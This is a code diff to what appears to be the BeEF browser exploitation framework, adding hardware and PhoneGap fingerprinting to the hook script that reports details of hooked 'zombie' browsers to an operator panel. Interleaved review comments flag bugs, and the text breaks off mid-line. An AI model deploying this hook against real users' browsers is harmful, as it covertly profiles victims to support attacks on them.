diff --git a/core/core.rb b/core/core.rb index dc554314b..6dcff13f2 100644 --- a/core/core.rb +++ b/core/core.rb @@ -34,6 +34,7 @@ require 'core/main/constants/browsers' require 'core/main/constants/commandmodule' require 'core/main/constants/distributedengine' require 'core/main/constants/os' +require 'core/main/constants/hardware' # @note Include core modules for beef require 'core/main/configuration' diff --git a/core/filters/browser.rb b/core/filters/browser.rb index f955fb6f6..7dbcfdfc6 100644 --- a/core/filters/browser.rb +++ b/core/filters/browser.rb @@ -47,6 +47,16 @@ module Filters true end + # Check the Hardware name value - for example, 'iPhone' + # @param [String] str String for testing + # @return [Boolean] If the string has valid Hardware name characters + def self.is_valid_hwname?(str) + return false if not is_non_empty_string?(str) + return false if has_non_printable_char?(str) + return false if str.length < 2 + true + end + # Verify the browser version string is valid # @param [String] str String for testing # @return [Boolean] If the string has valid browser version characters diff --git a/core/main/client/browser.js b/core/main/client/browser.js index 762072108..2e82f5de6 100644 --- a/core/main/client/browser.js +++ b/core/main/client/browser.js @@ -551,6 +551,19 @@ beef.browser = { }, + /** + * Checks if the Phonegap API is available from the hooked domain. + * @return: {Boolean} true or false. + * + * @example: if(beef.browser.hasJava()) { ... } + */ + hasPhonegap: function() { + var result = false; + try { if (!!device.phonegap) result = true; else result = false; } + catch(e) { result = false; } + return result; + }, + /** * Checks if the zombie has Java installed and enabled. * @return: {Boolean} true or false. 
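Review bot: `is_valid_hwname?` accepts any printable string of two or more characters, but the value it guards is sent by the hooked browser (which can POST whatever it likes) and the only legitimate values are the fixed names `beef.hardware.getName()` returns in this same change ('Nokia', 'Windows Phone', 'BlackBerry', 'iPhone', 'iPad', 'iPod', 'Kindle', 'HTC', 'Motorola', 'Zune', 'Google', 'Ericsson', 'Unknown'). Since the stored 'Hardware' value is later shown in the admin UI, validating against that closed list is both tighter and simpler: `HW_NAMES = ['Nokia', 'Windows Phone', 'BlackBerry', 'iPhone', 'iPad', 'iPod', 'Kindle', 'HTC', 'Motorola', 'Zune', 'Google', 'Ericsson', 'Unknown'].freeze` and `HW_NAMES.include?(str)` in place of the three checks. If free-form names are intentionally allowed, at least add an upper length bound, since nothing here caps what gets written to the database.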
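Review bot: The doc comment on the new `hasPhonegap` still carries the copied example `if(beef.browser.hasJava()) { ... }`; it should read `@example: if(beef.browser.hasPhonegap()) { ... }`. The body can also lose the redundant ternary-style branch, since `!!device.phonegap` already yields the boolean: `try { result = !!device.phonegap; } catch(e) { result = false; }`. Worth a one-line note that the `catch` is there because `device` is an undeclared global outside PhoneGap/Cordova and reading it throws a ReferenceError.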
@@ -765,6 +778,7 @@ beef.browser = { var browser_plugins = beef.browser.getPlugins(); var date_stamp = new Date().toString(); var os_name = beef.os.getName(); + var hw_name = beef.hardware.getName(); var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null; var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;}); var screen_size = beef.browser.getScreenSize(); @@ -772,6 +786,7 @@ beef.browser = { var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No"; var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No"; var has_flash = (beef.browser.hasFlash())? "Yes" : "No"; + var has_phonegap = (beef.browser.hasPhonegap())? "Yes" : "No"; var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No"; var has_web_socket=(beef.browser.hasWebSocket())? "Yes":"No"; var has_activex = (typeof(window.ActiveXObject) != "undefined") ? "Yes":"No"; @@ -789,6 +804,7 @@ beef.browser = { if(hostport) details["HostPort"] = hostport; if(browser_plugins) details["BrowserPlugins"] = browser_plugins; if(os_name) details['OsName'] = os_name; + if(hw_name) details['Hardware'] = hw_name; if(date_stamp) details['DateStamp'] = date_stamp; if(system_platform) details['SystemPlatform'] = system_platform; if(browser_type) details['BrowserType'] = browser_type; @@ -797,6 +813,7 @@ beef.browser = { if(java_enabled) details['JavaEnabled'] = java_enabled; if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled if(has_flash) details['HasFlash'] = has_flash + if(has_phonegap) details['HasPhonegap'] = has_phonegap if(has_web_socket) details['HasWebSocket'] = has_web_socket if(has_googlegears) details['HasGoogleGears'] = has_googlegears if(has_activex) details['HasActiveX'] = has_activex; 
diff --git a/core/main/client/hardware.js b/core/main/client/hardware.js
new file mode 100644
index 000000000..3376aceea
--- /dev/null
+++ b/core/main/client/hardware.js
@@ -0,0 +1,91 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.hardware = { + + ua: navigator.userAgent, + + isWinPhone: function() { + return (this.ua.match('(Windows Phone)')) ? true : false; + }, + + isIphone: function() { + return (this.ua.indexOf('iPhone') != -1) ? true : false; + }, + + isIpad: function() { + return (this.ua.indexOf('iPad') != -1) ? true : false; + }, + + isIpod: function() { + return (this.ua.indexOf('iPod') != -1) ? true : false; + }, + + isNokia: function() { + return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false; + }, + + isBlackBerry: function() { + return (this.ua.match('BlackBerry')) ? true : false; + }, + + isZune: function() { + return (this.ua.match('ZuneWP7')) ? true : false; + }, + + isKindle: function() { + return (this.ua.match('Kindle')) ? true : false; + }, + + isHtc: function() { + return (this.ua.match('HTC')) ? true : false; + }, + + isEricsson: function() { + return (this.ua.match('Ericsson')) ? true : false; + }, + + isNokia: function() { + return (this.ua.match('Nokia')) ? true : false; + }, + + isMotorola: function() { + return (this.ua.match('Motorola')) ? true : false; + }, + + isGoogle: function() { + return (this.ua.match('Nexus One')) ? 
true : false; + }, + + getName: function() { + + if (this.isNokia()) return 'Nokia'; + if (this.isWinPhone()) return 'Windows Phone'; + if (this.isBlackBerry()) return 'BlackBerry'; + if (this.isIphone()) return 'iPhone'; + if (this.isIpad()) return 'iPad'; + if (this.isIpod()) return 'iPod'; + if (this.isKindle()) return 'Kindle'; + if (this.isHtc()) return 'HTC'; + if (this.isMotorola()) return 'Motorola'; + if (this.isZune()) return 'Zune'; + if (this.isGoogle()) return 'Google'; + if (this.isEricsson()) return 'Ericsson'; + + return 'Unknown'; + } +}; + +beef.regCmp('beef.net.hardware'); diff --git a/core/main/client/os.js b/core/main/client/os.js index c133edcc9..9ccea8a9c 100644 --- a/core/main/client/os.js +++ b/core/main/client/os.js @@ -72,7 +72,11 @@ beef.os = { isMacintosh: function() { return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false; }, - + + isWinPhone: function() { + return (this.ua.match('(Windows Phone)')) ? true : false; + }, + isIphone: function() { return (this.ua.indexOf('iPhone') != -1) ? true : false; }, @@ -97,6 +101,10 @@ beef.os = { return (this.ua.match('BlackBerry')) ? true : false; }, + isWebOS: function() { + return (this.ua.match('webOS')) ? true : false; + }, + isQNX: function() { return (this.ua.match('QNX')) ? true : false; }, @@ -139,11 +147,14 @@ beef.os = { if(this.isSunOS()) return 'Sun OS'; //iPhone - if (this.isIphone()) return 'iPhone'; + if (this.isIphone()) return 'iOS'; //iPad - if (this.isIpad()) return 'iPad'; + if (this.isIpad()) return 'iOS'; //iPod - if (this.isIpod()) return 'iPod'; + if (this.isIpod()) return 'iOS'; + + // zune + //if (this.isZune()) return 'Zune'; //macintosh if(this.isMacintosh()) { @@ -156,6 +167,7 @@ beef.os = { //others if(this.isQNX()) return 'QNX'; if(this.isBeOS()) return 'BeOS'; + if(this.isWebOS()) return 'webOS'; return 'unknown'; } diff --git a/core/main/constants/hardware.rb b/core/main/constants/hardware.rb new file mode 100644 index 000000000..12386ef78 
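Review bot: `isNokia` is defined twice in the `beef.hardware` object literal, and the second definition (`match('Nokia')`) silently replaces the first (`match('(Maemo Browser)|(Symbian)|(Nokia)')`), so Maemo and Symbian user agents are no longer reported as Nokia; delete the second definition. The registration line `beef.regCmp('beef.net.hardware');` names a component that does not exist, the object is `beef.hardware`; if `regCmp` records the object's path as the other components do, this should be `beef.regCmp('beef.hardware');`. `getName()` could also document that order matters, since `isNokia` is checked before `isWinPhone` and `isHtc` on purpose.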
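Review bot: `isWinPhone` is added to `beef.os` but none of the `getName()` branches visible in these hunks returns it, and a Windows Phone user agent also contains 'Windows', so it will presumably be reported as desktop Windows by whichever check runs first (the start of `getName` lies outside the hunk, so this is inferred). Add `if (this.isWinPhone()) return 'Windows Phone';` ahead of the Windows check. The commented-out `//if (this.isZune()) return 'Zune';` refers to a method that exists only on `beef.hardware`, not `beef.os`; drop the dead comment rather than leave a misleading hint.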
--- /dev/null
+++ b/core/main/constants/hardware.rb
@@ -0,0 +1,89 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +module BeEF +module Core +module Constants + + # @note The hardware's strings for hardware detection. + module Hardware + + HW_UNKNOWN_IMG = 'pc.png' + HW_IPHONE_UA_STR = 'iPhone' + HW_IPHONE_IMG = 'iphone.jpg' + HW_IPAD_UA_STR = 'iPad' + HW_IPAD_IMG = 'ipad.png' + HW_IPOD_UA_STR = 'iPod' + HW_IPOD_IMG = 'ipod.jpg' + HW_BLACKBERRY_UA_STR = 'BlackBerry' + HW_BLACKBERRY_IMG = 'blackberry.png' + HW_WINPHONE_UA_STR = 'Windows Phone' + HW_WINPHONE_IMG = 'win.png' + HW_ZUNE_UA_STR = 'ZuneWP7' + HW_ZUNE_IMG = 'zune.gif' + HW_KINDLE_UA_STR = 'Kindle' + HW_KINDLE_IMG = 'kindle.png' + HW_NOKIA_UA_STR = 'Nokia' + HW_NOKIA_IMG = 'nokia.ico' + HW_HTC_UA_STR = 'HTC' + HW_HTC_IMG = 'htc.ico' + HW_MOTOROLA_UA_STR = 'motorola' + HW_MOTOROLA_IMG = 'motorola.png' + HW_GOOGLE_UA_STR = 'Nexus One' + HE_GOOGLE_IM = 'nexus.png' + HW_ERICSSON_UA_STR = 'Ericsson' + HW_ERICSSON_IMG = 'sony_ericsson.png' + HW_ALL_UA_STR = 'All' + + # Attempt to match operating system string to constant + # @param [String] name Name of operating system + # @return [String] Constant name of matched operating system, returns 'ALL' if nothing are matched + def self.match_hardware(name) + case name.downcase + when /iphone/ + HW_IPHONE_UA_STR + when /ipad/ + HW_IPAD_UA_STR + when /ipod/ + HW_IPOD_UA_STR + when /blackberry/ + HW_BLACKBERRY_UA_STR + when /windows phone/ + HW_WINPHONE_UA_STR + when 
/zune/ + HW_ZUNE_UA_STR + when /kindle/ + HW_KINDLE_UA_STR + when /nokia/ + HW_NOKIA_UA_STR + when /motorola/ + HW_MOTOROLA_UA_STR + when /htc/ + HW_HTC_UA_STR + when /google/ + HW_GOOGLE_UA_STR + when /ericsson/ + HW_ERICSSON_UA_STR + else + 'ALL' + end + end + + end + +end +end +end diff --git a/core/main/constants/os.rb b/core/main/constants/os.rb index 2e86f1e39..7f94ba0c4 100644 --- a/core/main/constants/os.rb +++ b/core/main/constants/os.rb 
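Review bot: `HE_GOOGLE_IM = 'nexus.png'` is a typo for `HW_GOOGLE_IMG`, which is the name `BrowserDetails.hw_icon` references in this same change, so any user agent reaching the Nexus One line raises `NameError`; rename it to `HW_GOOGLE_IMG = 'nexus.png'`. `HW_MOTOROLA_UA_STR = 'motorola'` is lowercase while every other `*_UA_STR` and the client-side `isMotorola` match is cased, and `hw_icon` uses case-sensitive `include?`, so it should be `'Motorola'`. The comment above `match_hardware` was copied from `match_os` and still says "operating system"; it should describe hardware names, and mention that `name.downcase` will raise on `nil` input, as `match_os` does.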
@@ -15,75 +15,74 @@ # module BeEF -module Core -module Constants - - # @note The OS'es strings for os detection. - module Os - - OS_UNKNOWN_IMG = 'unknown.png' - OS_WINDOWS_UA_STR = 'Windows' - OS_WINDOWS_IMG = 'win.png' - OS_LINUX_UA_STR = 'Linux' - OS_LINUX_IMG = 'linux.png' - OS_MAC_UA_STR = 'Mac' - OS_MAC_IMG = 'mac.png' - OS_QNX_UA_STR = 'QNX' - OS_QNX_IMG = 'qnx.ico' - OS_BEOS_UA_STR = 'BeOS' - OS_BEOS_IMG = 'beos.png' - OS_OPENBSD_UA_STR = 'OpenBSD' - OS_OPENBSD_IMG = 'openbsd.ico' - OS_IPHONE_UA_STR = 'iPhone' - OS_IPHONE_IMG = 'iphone.png' - OS_IPAD_UA_STR = 'iPad' - OS_IPAD_IMG = 'ipad.png' - OS_IPOD_UA_STR = 'iPod' - OS_IPOD_IMG = 'ipod.jpg' - OS_MAEMO_UA_STR = 'Maemo' - OS_MAEMO_IMG = 'maemo.ico' - OS_BLACKBERRY_UA_STR = 'BlackBerry' - OS_BLACKBERRY_IMG = 'blackberry.png' - OS_ANDROID_UA_STR = 'Android' - OS_ANDROID_IMG = 'android.png' - OS_ALL_UA_STR = 'All' + module Core + module Constants + + # @note The OS'es strings for os detection. + module Os + + OS_UNKNOWN_IMG = 'unknown.png' + OS_WINDOWS_UA_STR = 'Windows' + OS_WINDOWS_IMG = 'win.png' + OS_LINUX_UA_STR = 'Linux' + OS_LINUX_IMG = 'linux.png' + OS_MAC_UA_STR = 'Mac' + OS_MAC_IMG = 'mac.png' + OS_QNX_UA_STR = 'QNX' + OS_QNX_IMG = 'qnx.ico' + OS_BEOS_UA_STR = 'BeOS' + OS_BEOS_IMG = 'beos.png' + OS_OPENBSD_UA_STR = 'OpenBSD' + OS_OPENBSD_IMG = 'openbsd.ico' + OS_IOS_UA_STR = 'iOS' + OS_IOS_IMG = 'ios.png' + OS_IPHONE_UA_STR = 'iPhone' + OS_WEBOS_UA_STR = 'webos.png' + OS_IPHONE_IMG = 'iphone.jpg' + OS_IPAD_UA_STR = 'iPad' + OS_IPAD_IMG = 'ipad.png' + OS_IPOD_UA_STR = 'iPod' + OS_IPOD_IMG = 'ipod.jpg' + OS_MAEMO_UA_STR = 'Maemo' + OS_MAEMO_IMG = 'maemo.ico' + OS_BLACKBERRY_UA_STR = 'BlackBerry' + OS_BLACKBERRY_IMG = 'blackberry.png' + OS_ANDROID_UA_STR = 'Android' + OS_ANDROID_IMG = 'android.png' + OS_ALL_UA_STR = 'All' # Attempt to match operating system string to constant # @param [String] name Name of operating system # @return [String] Constant name of matched operating system, returns 'ALL' if 
nothing are matched - def self.match_os(name) - case name.downcase - when /win/ - OS_WINDOWS_UA_STR - when /lin/ - OS_LINUX_UA_STR - when /os x/, /osx/, /mac/ - OS_MAC_UA_STR - when /qnx/ - OS_QNX_UA_STR - when /beos/ - OS_BEOS_UA_STR - when /openbsd/ - OS_OPENBSD_UA_STR - when /iphone/ - OS_IPHONE_UA_STR - when /ipad/ - OS_IPAD_UA_STR - when /ipod/ - OS_IPOD_UA_STR - when /maemo/ - OS_MAEMO_UA_STR - when /blackberry/ - OS_BLACKBERRY_UA_STR - when /android/ - OS_ANDROID_UA_STR - else - 'ALL' - end - end - + def self.match_os(name) + case name.downcase + when /win/ + OS_WINDOWS_UA_STR + when /lin/ + OS_LINUX_UA_STR + when /os x/, /osx/, /mac/ + OS_MAC_UA_STR + when /qnx/ + OS_QNX_UA_STR + when /beos/ + OS_BEOS_UA_STR + when /openbsd/ + OS_OPENBSD_UA_STR + when /ios/, /iphone/, /ipad/, /ipod/ + OS_IOS_UA_STR + when /maemo/ + OS_MAEMO_UA_STR + when /blackberry/ + OS_BLACKBERRY_UA_STR + when /android/ + OS_ANDROID_UA_STR + else + 'ALL' + end + end + + end + + end end - -end -end end diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb index dfb3b8040..9a5f27946 100644 --- a/core/main/handlers/browserdetails.rb +++ b/core/main/handlers/browserdetails.rb @@ -118,6 +118,14 @@ module BeEF self.err_msg "Invalid operating system name returned from the hook browser's initial connection." end + # get and store the hardware name + hw_name = get_param(@data['results'], 'Hardware') + if BeEF::Filters.is_valid_hwname?(hw_name) + BD.set(session_id, 'Hardware', hw_name) + else + self.err_msg "Invalid hardware name returned from the hook browser's initial connection." + end + # get and store the date date_stamp = get_param(@data['results'], 'DateStamp') if BeEF::Filters.is_valid_date_stamp?(date_stamp) 
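Review bot: `OS_WEBOS_UA_STR = 'webos.png'` holds the icon filename rather than a user-agent substring, and `OS_WEBOS_IMG`, which `BrowserDetails.os_icon` now references, is never defined, so webOS detection can never succeed. The intended lines are `OS_WEBOS_UA_STR = 'webOS'` and `OS_WEBOS_IMG = 'webos.png'`. `match_os` also gained no webOS branch, so a 'webOS' name falls through to 'ALL'; add `when /webos/` returning `OS_WEBOS_UA_STR`. Re-indenting the whole module in the same hunk hides these three real changes; keep whitespace-only moves in a separate commit.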
@@ -222,6 +230,14 @@ module BeEF self.err_msg "Invalid value for HasFlash returned from the hook browser's initial connection." end + # get and store the yes|no value for HasPhonegap + has_phonegap = get_param(@data['results'], 'HasPhonegap') + if BeEF::Filters.is_valid_yes_no?(has_phonegap) + BD.set(session_id, 'HasPhonegap', has_phonegap) + else + self.err_msg "Invalid value for HasPhonegap returned from the hook browser's initial connection." + end + # get and store the yes|no value for HasGoogleGears has_googlegears = get_param(@data['results'], 'HasGoogleGears') if BeEF::Filters.is_valid_yes_no?(has_googlegears) diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb index 92473876d..b7ca90bae 100644 --- a/core/main/handlers/modules/beefjs.rb +++ b/core/main/handlers/modules/beefjs.rb 
@@ -32,9 +32,9 @@ module Modules # @note we load websocket library only if ws server is enabled in config.yalm # check in init.js if config.get("beef.http.websocket.enable") - js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js) + js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js) else - js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js) + js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js) end # @note construct the beefjs string from file(s) diff --git a/core/main/models/browserdetails.rb b/core/main/models/browserdetails.rb index 0cd114c75..3ac2cd2af 100644 --- a/core/main/models/browserdetails.rb +++ b/core/main/models/browserdetails.rb @@ -62,7 +62,7 @@ module Models browserdetails end - + # # Returns the icon representing the browser type the # hooked browser is using (i.e. Firefox, Internet Explorer) 
@@ -94,9 +94,10 @@ module Models return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR return BeEF::Core::Constants::Os::OS_OPENBSD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_OPENBSD_UA_STR - return BeEF::Core::Constants::Os::OS_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR - return BeEF::Core::Constants::Os::OS_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR - return BeEF::Core::Constants::Os::OS_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR + return BeEF::Core::Constants::Os::OS_WEBOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WEBOS_UA_STR + return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR + return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR + return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR 
@@ -105,6 +106,33 @@ module Models BeEF::Core::Constants::Os::OS_UNKNOWN_IMG end + # + # Returns the icon representing the hardware the + # zombie is running on (i.e. iPhone, BlackBerry) + # + def self.hw_icon(session_id) + + ua_string = get(session_id, 'BrowserReportedName') + + return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil? + + return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR + return BeEF::Core::Constants::Hardware::HW_ZUNE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ZUNE_UA_STR + return BeEF::Core::Constants::Hardware::HW_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_BLACKBERRY_UA_STR + return BeEF::Core::Constants::Hardware::HW_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPHONE_UA_STR + return BeEF::Core::Constants::Hardware::HW_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPAD_UA_STR + return BeEF::Core::Constants::Hardware::HW_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPOD_UA_STR + return BeEF::Core::Constants::Hardware::HW_KINDLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_KINDLE_UA_STR + return BeEF::Core::Constants::Hardware::HW_NOKIA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_NOKIA_UA_STR + return BeEF::Core::Constants::Hardware::HW_MOTOROLA_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_MOTOROLA_UA_STR + return BeEF::Core::Constants::Hardware::HW_HTC_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_HTC_UA_STR + return BeEF::Core::Constants::Hardware::HW_GOOGLE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_GOOGLE_UA_STR + return BeEF::Core::Constants::Hardware::HW_ERICSSON_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ERICSSON_UA_STR + + BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG + + end + end end 
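Review bot: `hw_icon` references `BeEF::Core::Constants::Hardware::HW_GOOGLE_IMG`, but the constants file added in this change defines `HE_GOOGLE_IM`, so a user agent containing 'Nexus One' that matches none of the earlier lines raises `NameError` in the panel. The Motorola line compares case-sensitively against `HW_MOTOROLA_UA_STR = 'motorola'`, which does not match the capitalised 'Motorola' the client-side detector looks for, so that icon is unreachable. A short comment noting that order matters (Windows Phone and Zune are tested before the handset vendors whose names also appear in those user agents) would help the next maintainer.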
diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb index b30573a0d..6fce2a02c 100644 --- a/extensions/admin_ui/controllers/modules/modules.rb +++ b/extensions/admin_ui/controllers/modules/modules.rb @@ -136,7 +136,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController # set and add the return values for the os name os_name = BD.get(zombie_session, 'OsName') - if not host_name.nil? + if not os_name.nil? encoded_os_name = CGI.escapeHTML(os_name) encoded_os_name_hash = { 'OS Name' => encoded_os_name } @@ -148,6 +148,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController summary_grid_hash['results'].push(page_name_row) # add the row end + + # set and add the return values for the hardware name + hw_name = BD.get(zombie_session, 'Hardware') + if not hw_name.nil? + encoded_hw_name = CGI.escapeHTML(hw_name) + encoded_hw_name_hash = { 'Hardware' => encoded_hw_name } + + page_name_row = { + 'category' => 'Host', + 'data' => encoded_hw_name_hash, + 'from' => 'Initialization' + } + + summary_grid_hash['results'].push(page_name_row) # add the row + end # set and add the return values for the browser name browser_name = BD.get(zombie_session, 'BrowserName') @@ -331,6 +346,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController summary_grid_hash['results'].push(page_name_row) # add the row end + # set and add the yes|no value for hasPhonegap + has_phonegap = BD.get(zombie_session, 'hasPhonegap') + if not has_phonegap.nil? + encoded_has_phonegap = CGI.escapeHTML(has_phonegap) + encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap } + + page_name_row = { + 'category' => 'Browser', + 'data' => encoded_has_phonegap_hash, + 'from' => 'Initialization' + } + + summary_grid_hash['results'].push(page_name_row) # add the row + end + # set and add the yes|no value for HasGoogleGears has_googlegears = BD.get(zombie_session, 'HasGoogleGears') if not has_googlegears.nil? 
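Review bot: The new Phonegap row reads `BD.get(zombie_session, 'hasPhonegap')`, but the handler in this same change stores the value under `'HasPhonegap'`, so the lookup is always `nil` and the row never appears; change it to `has_phonegap = BD.get(zombie_session, 'HasPhonegap')`. The hardware row reuses `page_name_row` for a 'Hardware' entry, which is fine but the variable name is now misleading; `hw_name_row` would read better.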
diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb
index f50adb121..a1a35998b 100644
--- a/extensions/admin_ui/controllers/panel/panel.rb
+++ b/extensions/admin_ui/controllers/panel/panel.rb
@@ -14,94 +14,115 @@ # limitations under the License. # module BeEF -module Extension -module AdminUI -module Controllers + module Extension + module AdminUI + module Controllers # # # -class Panel < BeEF::Extension::AdminUI::HttpController - - def initialize - super({ - 'paths' => { - '/' => method(:index), - '/hooked-browser-tree-update.json' => method(:hooked_browser_tree_update) - } - }) - end - - # default index page - def index; end - - # return a JSON object contains all the updates for the hooked browser trees - def hooked_browser_tree_update - # retrieve the hbs that are online - hooked_browsers_online = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30))) - - # retrieve the hbs that are offline - hooked_browsers_offline = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30))) - - # retrieve the distributed engine rules that are enabled - distributed_engine_rules = distributed_engine_rules_2_json_simple(BeEF::Core::DistributedEngine::Models::Rules.all(:enabled => true)) - - # hash that gets populated with all the information for the hb trees - ret = { - 'success' => true, - - # the list of hb - 'hooked-browsers' => { - 'online' => hooked_browsers_online, - 'offline' => hooked_browsers_offline - }, - - # the rules for the distributed engine - 'ditributed-engine-rules' => distributed_engine_rules - } - - @body = ret.to_json - end - - # Takes a list distributed engine rules and format the results into JSON - def distributed_engine_rules_2_json_simple(rules) + class Panel < BeEF::Extension::AdminUI::HttpController - end - - # Takes a list of zombies and format the results in a JSON array. 
- def zombies2json_simple(zombies) - zombies_hash = {} - i = 0 - - zombies.each do |zombie| - # create hash of zombie details - zombies_hash[i] = (get_simple_hooked_browser_hash(zombie)) - i+=1 + def initialize + super({ + 'paths' => { + '/' => method(:index), + '/hooked-browser-tree-update.json' => method(:hooked_browser_tree_update) + } + }) + end + + # default index page + def index; + end + + # return a JSON object contains all the updates for the hooked browser trees + def hooked_browser_tree_update + # retrieve the hbs that are online + hooked_browsers_online = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30))) + + # retrieve the hbs that are offline + hooked_browsers_offline = zombies2json_simple(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30))) + + # retrieve the distributed engine rules that are enabled + distributed_engine_rules = distributed_engine_rules_2_json_simple(BeEF::Core::DistributedEngine::Models::Rules.all(:enabled => true)) + + # hash that gets populated with all the information for the hb trees + ret = { + 'success' => true, + + # the list of hb + 'hooked-browsers' => { + 'online' => hooked_browsers_online, + 'offline' => hooked_browsers_offline + }, + + # the rules for the distributed engine + 'ditributed-engine-rules' => distributed_engine_rules + } + + @body = ret.to_json + end + + # Takes a list distributed engine rules and format the results into JSON + def distributed_engine_rules_2_json_simple(rules) + + end + + # Takes a list of zombies and format the results in a JSON array. 
+ def zombies2json_simple(zombies) + zombies_hash = {} + i = 0 + + zombies.each do |zombie| + # create hash of zombie details + zombies_hash[i] = (get_simple_hooked_browser_hash(zombie)) + i+=1 + end + + zombies_hash + end + + # create a hash of simple hooked browser details + def get_simple_hooked_browser_hash(hooked_browser) + + browser_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserName') + browser_version = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserVersion') + browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session) + os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session) + os_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName') + hw_icon = BeEF::Core::Models::BrowserDetails.hw_icon(hooked_browser.session) + hw_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware') + domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName') + has_flash = 